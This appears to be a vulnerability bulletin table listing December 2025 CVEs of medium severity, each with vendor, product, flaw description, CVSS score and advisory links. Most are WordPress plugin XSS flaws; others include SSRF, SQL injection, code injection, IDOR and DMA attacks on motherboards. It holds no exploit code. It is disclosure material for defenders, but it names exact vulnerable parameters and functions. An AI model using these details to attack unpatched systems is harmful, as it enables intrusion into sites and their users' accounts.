| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the YouTube Video 'value' field in all versions up to, and including, 2.11.0. This is due to insufficient input sanitization and output escaping on user-supplied YouTube video URLs in the `um_profile_field_filter_hook__youtube_video()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses the injected user's profile page. | 2025-12-17 | 6.4 | CVE-2025-13217 | https://www.wordfence.com/threat-intel/vulnerabilities/id/876b57e0-cf1e-4ce9-ba85-a5d4554797bd?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/includes/core/um-filters-fields.php#L80 https://plugins.trac.wordpress.org/changeset/3421362/ |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode attributes in all versions up to, and including, 2.11.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13220 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c06548-238d-4b75-8f20-d7de6fc21539?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L67 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L525 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L558 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L591 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L625 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L542 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421362%40ultimate-member&new=3421362%40ultimate-member&sfp_email=&sfph_mail= |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.4.8. This is due to a time-of-check/time-of-use (TOCTOU) race condition in the 'url' parameter of the fpd_custom_uplod_file AJAX action. The plugin validates the URL by calling getimagesize() first, then later retrieves the same URL using file_get_contents(). This makes it possible for unauthenticated attackers to exploit the timing gap to perform SSRF attacks by serving a valid image during validation, then changing the response to redirect to arbitrary internal or external URLs during the actual fetch. | 2025-12-16 | 6.5 | CVE-2025-13231 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c56ec6ae-5b75-4cbb-aedd-f318fddc7bf0?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| tikolan--WP Hallo Welt | The WP Hallo Welt plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'hallo_welt_seite' function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Due to the insufficient input sanitization and output escaping, this can lead to Stored Cross-Site Scripting. | 2025-12-20 | 6.1 | CVE-2025-13365 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e422aa58-a335-4734-bbcd-d400bd44bc89?source=cve https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L53 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/tags/1.4./hallowelt.php#L53 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L54 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L66 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L15 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L27 |
| wpeverest--User Registration & Membership Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin | The User Registration & Membership - Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcode attributes in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13367 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2244945a-5b3a-463d-9910-46a6f7afaf6c?source=cve https://plugins.trac.wordpress.org/changeset/3412096/user-registration/trunk/modules/membership/includes/Templates/membership-listing.php https://plugins.trac.wordpress.org/changeset/3412096/user-registration/trunk/modules/membership/includes/Templates/thank-you-page.php |
| Fortra--Core Privileged Access Manager (BoKS) | Insecure defaults in the Server Agent component of Fortra's Core Privileged Access Manager (BoKS) can result in the selection of weak password hash algorithms. This issue affects BoKS Server Agent 9.0 instances that support yescrypt and are running in a BoKS 8.1 domain. | 2025-12-16 | 6.2 | CVE-2025-13532 | https://www.fortra.com/security/advisories/product-security/fi-2025-014 |
| livecomposer--Live Composer Free WordPress Website Builder | The Live Composer - Free WordPress Website Builder plugin for WordPress is vulnerable to multiple Stored Cross-Site Scripting vulnerabilities via DOM manipulation in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-13537 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a9f8ab73-8c2a-4551-bad9-4e5cc67231e5?source=cve https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/js/src/client/frontend/index.js#L126 https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/js/src/client/frontend/index.js#L926 https://plugins.trac.wordpress.org/changeset/3419715/ |
| caterhamcomputing--CC Child Pages | The CC Child Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'child_pages' shortcode in all versions up to, and including, 2.0.0. This is due to insufficient input sanitization and output escaping on four user-supplied attributes (use_custom_link, use_custom_link_target, use_custom_thumbs, and use_custom_excerpt) in the 'show_child_pages' function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13608 | https://www.wordfence.com/threat-intel/vulnerabilities/id/139009b5-69d4-44ca-820c-766645828e5e?source=cve https://plugins.trac.wordpress.org/changeset/3403877/cc-child-pages |
| metagauss--RegistrationMagic Custom Registration Forms, User Registration, Payment, and User Login | The RegistrationMagic - Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RM_Forms' shortcode in all versions up to, and including, 6.0.6.7 due to insufficient input sanitization and output escaping on the 'theme' attribute. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13610 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4be512bd-190a-415a-bd20-a49373f63fbb?source=cve https://plugins.trac.wordpress.org/changeset/3414853/custom-registration-form-builder-with-submission-manager |
| travishoki--Overstock Affiliate Links | The Overstock Affiliate Links plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-20 | 6.1 | CVE-2025-13624 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c06207da-d15d-4540-84be-218fa9055fd5?source=cve https://wordpress.org/plugins/overstock-affiliate-links/ https://plugins.trac.wordpress.org/browser/overstock-affiliate-links/trunk/sandbox_page.php#L18 https://plugins.trac.wordpress.org/browser/overstock-affiliate-links/tags/1.1/sandbox_page.php#L18 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13693 | https://www.wordfence.com/threat-intel/vulnerabilities/id/625d2b09-a6b9-4c0c-8c36-3c565e688aac?source=cve https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/trunk/lib/gallery-class.php#L126 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.6/lib/gallery-class.php#L126 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418337%40final-tiles-grid-gallery-lite&new=3418337%40final-tiles-grid-gallery-lite&sfp_email=&sfph_mail= |
| techjewel--FluentAuth The Ultimate Authorization & Security Plugin for WordPress | The FluentAuth - The Ultimate Authorization & Security Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `fluent_auth_reset_password` shortcode in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13728 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a3187d3e-e1da-4af7-a1fa-9657389f9e22?source=cve https://plugins.trac.wordpress.org/changeset/3409232/fluent-security/tags/2.1.0/app/Hooks/Handlers/CustomAuthHandler.php |
| daggerhart--OpenID Connect Generic Client | The OpenID Connect Generic Client plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'openid_connect_generic_auth_url' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-13730 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe5fd453-b1fc-4d52-bb46-aebd68508891?source=cve https://plugins.trac.wordpress.org/browser/daggerhart-openid-connect-generic/trunk/openid-connect-generic.php#L168 https://plugins.trac.wordpress.org/browser/daggerhart-openid-connect-generic/trunk/includes/openid-connect-generic-client-wrapper.php#L241 https://plugins.trac.wordpress.org/changeset/3418927 |
| someguy9--Lightweight Accordion | The Lightweight Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `lightweight-accordion` shortcode in all versions up to, and including, 1.5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13740 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f117f713-e2f1-4803-87f7-14b1576d823b?source=cve https://plugins.trac.wordpress.org/changeset/3413649/ |
| htplugins--WishSuite Wishlist for WooCommerce | The WishSuite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_text' parameter of the 'wishsuite_button' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e1cd584-ffb8-43d6-a7b6-141c59ac463d?source=cve https://plugins.trac.wordpress.org/browser/wishsuite/trunk/includes/templates/wishsuite-button-add.php#L1 https://plugins.trac.wordpress.org/browser/wishsuite/tags/1.5.1/includes/templates/wishsuite-button-add.php#L1 https://plugins.trac.wordpress.org/changeset/3419202/ |
| linksoftware--HTML Forms Simple WordPress Forms Plugin | The HTML Forms - Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page. | 2025-12-17 | 6.1 | CVE-2025-13861 | https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321 https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail= |
| adreastrian--WP Social Ninja Embed Social Feeds, User Reviews & Chat Widgets | The WP Social Ninja - Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify the plugin's advanced settings. | 2025-12-17 | 6.5 | CVE-2025-13880 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8e3cb9-00b3-4500-adf0-c8a9fbf9d546?source=cve https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Routes/api.php#L44 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Policies/SettingsPolicy.php#L14 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Services/PermissionManager.php#L176 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Controllers/SettingsController.php#L144 |
| Inductive Automation--Ignition | The vulnerability affects Ignition SCADA applications where Python scripting is utilized for automation purposes. The vulnerability arises from the absence of proper security controls that restrict which Python libraries can be imported and executed within the scripting environment. The core issue lies in the Ignition service account having system permissions beyond what an Ignition privileged user requires. When an authenticated administrator uploads a malicious project file containing Python scripts with bind shell capabilities, the application executes these scripts with the same privileges as the Ignition Gateway process, which typically runs with SYSTEM-level permissions on Windows. Alternative code execution patterns could lead to similar results. | 2025-12-18 | 6.4 | CVE-2025-13911 | https://security.inductiveautomation.com/ https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-01.json |
| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor - Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple attack vectors in all versions up to, and including, 6.5.3. This is due to insufficient input sanitization and output escaping in the Event Calendar widget's custom attributes handling and the Image Masking module's element ID rendering. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-13977 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a0de0b28-fbad-4fcf-a7ab-35c545c19a4a?source=cve https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/assets/front-end/js/view/event-calendar.min.js https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/includes/Extensions/Image_Masking.php#L498 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/includes/Extensions/Image_Masking.php#L587 https://plugins.trac.wordpress.org/changeset/3419289/essential-addons-for-elementor-lite/trunk/includes/Extensions/Image_Masking.php |
| IBM--UCD - IBM DevOps Deploy | IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 could allow an authenticated user with LLM integration configuration privileges to recover a previously saved LLM API Token. | 2025-12-15 | 6.5 | CVE-2025-14148 | https://www.ibm.com/support/pages/node/7254663 |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'outbound_resource' parameter in the slimtrack AJAX action in all versions up to, and including, 5.3.2. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.1 | CVE-2025-14151 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ee675dd-5b43-439f-9717-6c531e9bf066?source=cve https://plugins.trac.wordpress.org/browser/wp-slimstat/tags/5.3.2/admin/view/wp-slimstat-reports.php#L1341 https://plugins.trac.wordpress.org/browser/wp-slimstat/tags/5.3.2/admin/view/right-now.php#L273 https://plugins.trac.wordpress.org/changeset/3421814/wp-slimstat/trunk?contextall=1&old=3401545&old_path=%2Fwp-slimstat%2Ftrunk#file4 |
| wordplus--Better Messages Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss | The Better Messages - Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via guest display name in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.1 | CVE-2025-14154 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d68bbf0d-72e9-4295-a1e1-4abeb36cae1b?source=cve https://plugins.trac.wordpress.org/changeset/3420771/bp-better-messages/trunk/inc/guests.php |
| GIGABYTE--intel 600 chipset Motherboard | Certain motherboard models developed by GIGABYTE have a Protection Mechanism Failure vulnerability. Because the IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14302 | https://www.twcert.org.tw/tw/cp-132-10574-ddf09-1.html https://www.twcert.org.tw/en/cp-139-10575-e4f41-2.html https://www.gigabyte.com/Support/Security?type=1 |
| MSI--Intel 600 chipset motherboard | Certain motherboard models developed by MSI have a Protection Mechanism Failure vulnerability. Because the IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14303 | https://www.twcert.org.tw/tw/cp-132-10576-0a0fd-1.html https://www.twcert.org.tw/en/cp-139-10577-3cd58-2.html https://csr.msi.com/global/product-security-advisories |
| ASRock--Intel 500 chipset motherboard | Certain motherboard models developed by ASRock and its subsidiaries, ASRockRack and ASRockInd., have a Protection Mechanism Failure vulnerability. Because the IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14304 | https://www.twcert.org.tw/tw/cp-132-10578-c43b4-1.html https://www.twcert.org.tw/en/cp-139-10579-9205b-2.html https://www.asrock.com/support/Security.asp https://www.asrockind.com/zh-tw/security-center |
| Proliz Software Ltd.--OBS (Student Affairs Information System)0 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Proliz Software Ltd. OBS (Student Affairs Information System)0 allows Reflected XSS. This issue affects OBS (Student Affairs Information System)0: before 26.5009. | 2025-12-17 | 6.3 | CVE-2025-14347 | https://www.usom.gov.tr/bildirim/tr-25-0463 |
| brechtvds--WP Recipe Maker | The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 10.2.3 due to insufficient input sanitization and output escaping on user-supplied attributes in the wprm-recipe-roundup-item shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-14385 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6030712-ae4f-4cdb-a500-dff689947ff3?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php#L244 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php#L372 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php#L83 https://plugins.trac.wordpress.org/changeset/3419784/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-14387 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f29b3a37-436d-4d03-8818-d5267b23067b?source=cve https://github.com/LearnPress/learnpress/commit/3bdaa63920c7d485e7efa7c92d3f19273a2916ff |
| bookingalgorithms--BA Book Everything | The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's babe-search-form shortcode in all versions up to, and including, 1.8.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.4 | CVE-2025-14449 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2be1fbfc-a809-4a42-9be4-24c8274c1e71?source=cve https://plugins.trac.wordpress.org/changeset/3418011/ba-book-everything |
| fastpi-sso--fastapi-sso | Versions of the package fastapi-sso before 0.19.0 are vulnerable to Cross-site Request Forgery (CSRF) due to the improper validation of the OAuth state parameter during the authentication callback. While the get_login_url method allows for state generation, it does not persist the state or bind it to the user's session. Consequently, the verify_and_process method accepts the state received in the query parameters without verifying it against a trusted local value. This allows a remote attacker to trick a victim into visiting a malicious callback URL, which can result in the attacker's account being linked to the victim's internal account. | 2025-12-19 | 6.3 | CVE-2025-14546 | https://security.snyk.io/vuln/SNYK-PYTHON-FASTAPISSO-14386403 https://github.com/tomasvotava/fastapi-sso/commit/6117d1a5ad498ba57d671e8a059ebe20db5abe02 https://github.com/tomasvotava/fastapi-sso/issues/266 |
| Ugreen--DH2100+ | A vulnerability has been found in Ugreen DH2100+ up to 5.3.0. This affects an unknown function of the component USB Handler. Such manipulation leads to symlink following. The attack can be executed directly on the physical device. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 6.6 | CVE-2025-14693 | VDB-336411: Ugreen DH2100+ USB symlink; VDB-336411: CTI Indicators (IOB, IOC); Submit #704646: Ugreen NAS DH2100+ V5.3.0 Incorrect Access Control; Submit #704657: Ugreen Ugreen NAS DH2100+ V5.3.0 Incorrect Access Control (Duplicate); https://www.notion.so/2bc6cf4e528a8083bf3fc6f7a953f0a1 |
| SamuNatsu--HaloBot | A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Manipulation of the argument action can lead to improper control of dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning, which is why information about affected and unaffected releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-15 | 6.3 | CVE-2025-14695 | VDB-336413: SamuNatsu HaloBot Inter-plugin API index.js html_renderer dynamically-managed code resources; VDB-336413: CTI Indicators (IOB, IOC, IOA); Submit #705587: SamuNatsu HaloBot 1.0 Improper Control of Dynamically-Managed Code Resources; https://github.com/rassec2/dbcve/issues/20 |
| CTCMS--Content Management System | A weakness has been identified in CTCMS Content Management System up to 2.1.2. This affects an unknown function in the library /ctcms/apps/libraries/CT_Parser.php of the component Frontend/Template Management Module. This manipulation causes improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-15 | 6.3 | CVE-2025-14731 | VDB-336488 | CTCMS Content Management System Frontend/Template Management CT_Parser.php special elements used in a template engine VDB-336488 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707106 | ctcms 2.1.2 Command Injection Submit #707107 | ctcms 2.1.2 Command Injection (Duplicate) https://note-hxlab.wetolink.com/share/Ros8ZIeCLQrN https://note-hxlab.wetolink.com/share/U6cnRoRfn09r |
| Ningyuanda--TC155 | A vulnerability was identified in Ningyuanda TC155 57.0.2.0. This impacts an unknown function of the file /onvif/device_service of the component ONVIF PTZ Control Interface. The manipulation leads to improper access controls. The attack requires being on the local network. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 6.3 | CVE-2025-14749 | VDB-336522 | Ningyuanda TC155 ONVIF PTZ Control device_service access control VDB-336522 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707198 | Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Unauthenticated ONVIF PTZ Full Remote Camera Control https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-PTZ-Remote-Control.md |
| ALASCA--YAOOK | Incorrect configuration of replication security in the MariaDB component of the infra-operator in YAOOK Operator allows an on-path attacker to read database contents, potentially including credentials | 2025-12-16 | 6.5 | CVE-2025-14758 | GitLab Issue #631 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An IDOR (Broken Access Control) vulnerability exists in the admin API endpoints for authorization resource management, specifically in ResourceSetService and PermissionTicketService. The system checks authorization against the resourceServer (client) ID provided in the API request, but the backend database lookup and modification operations (findById, delete) only use the resourceId. This mismatch allows an authenticated attacker with fine-grained admin permissions for one client (e.g., Client A) to delete or update resources belonging to another client (Client B) within the same realm by supplying a valid resource ID. | 2025-12-16 | 6 | CVE-2025-14777 | https://access.redhat.com/security/cve/CVE-2025-14777 RHBZ#2422596 |
| Xiongwei--Smart Catering Cloud Platform | A vulnerability was detected in Xiongwei Smart Catering Cloud Platform 2.1.6446.28761. The affected element is an unknown function of the file /dishtrade/dish_trade_detail_get. The manipulation of the argument filter results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-16 | 6.3 | CVE-2025-14780 | VDB-336607 | Xiongwei Smart Catering Cloud Platform dish_trade_detail_get sql injection VDB-336607 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #674051 | Hangzhou Xiongwei Technology Development Co., Ltd Smart Catering Cloud Platform 2.1.6446.28761 SQL injection https://github.com/zhangbuneng/3/issues/1 |
| code-projects--Simple Stock System | A weakness has been identified in code-projects Simple Stock System 1.0. This affects an unknown function of the file /checkuser.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-17 | 6.3 | CVE-2025-14834 | VDB-336983 | code-projects Simple Stock System checkuser.php sql injection VDB-336983 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715228 | code-projects Simple Stock System In PHP 1.0 SQL Injection https://gist.github.com/b1uel0n3/06593fd15acd0f2f61c29c5595453755 https://code-projects.org/ |
| y_project--RuoYi | A security vulnerability has been detected in y_project RuoYi up to 4.8.1. The affected element is an unknown function of the file /monitor/cache/getnames. Such manipulation of the argument fragment leads to code injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-18 | 6.3 | CVE-2025-14856 | VDB-337047 | y_project RuoYi getnames code injection VDB-337047 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710152 | Ruoyi Management System V4.8.1 Code Injection https://github.com/ltranquility/CVE/issues/26 |
| SourceCodester--Client Database Management System | A flaw has been found in SourceCodester Client Database Management System 1.0. This affects an unknown part of the file /user_leads.php of the component Leads Generation Module. Executing manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-18 | 6.3 | CVE-2025-14885 | VDB-337373 | SourceCodester Client Database Management System Leads Generation user_leads.php unrestricted upload VDB-337373 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715595 | SourceCodester Client Database Management System 1 Unrestricted Upload https://medium.com/@rvpipalwa/remote-code-execution-rce-vulnerability-report-4394b38ff90e https://www.sourcecodester.com/ |
| JeecgBoot--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.0. The affected element is an unknown function of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysTenantController.java of the component Multi-Tenant Management Module. Performing manipulation of the argument ID results in improper authentication. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. The patch is named e1c8f00bf2a2e0edddbaa8119afe1dc92d9dc1d2/67795493bdc579e489d3ab12e52a1793c4f8a0ee. It is recommended to apply a patch to fix this issue. | 2025-12-19 | 6.3 | CVE-2025-14908 | VDB-337432 | JeecgBoot Multi-Tenant Management SysTenantController.java improper authentication VDB-337432 | CTI Indicators (IOB, IOC, IOA) Submit #715742 | jeecgboot 3.9.0 bfla https://github.com/jeecgboot/JeecgBoot/issues/9196 https://github.com/jeecgboot/JeecgBoot/commit/e1c8f00bf2a2e0edddbaa8119afe1dc92d9dc1d2 |
| Elastic--Elasticsearch | Improper Authentication in Elasticsearch PKI realm can lead to user impersonation via specially crafted client certificates. A malicious actor would need to have such a crafted client certificate signed by a legitimate, trusted Certificate Authority. | 2025-12-15 | 6.8 | CVE-2025-37731 | https://discuss.elastic.co/t/elasticsearch-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-27/384063 |
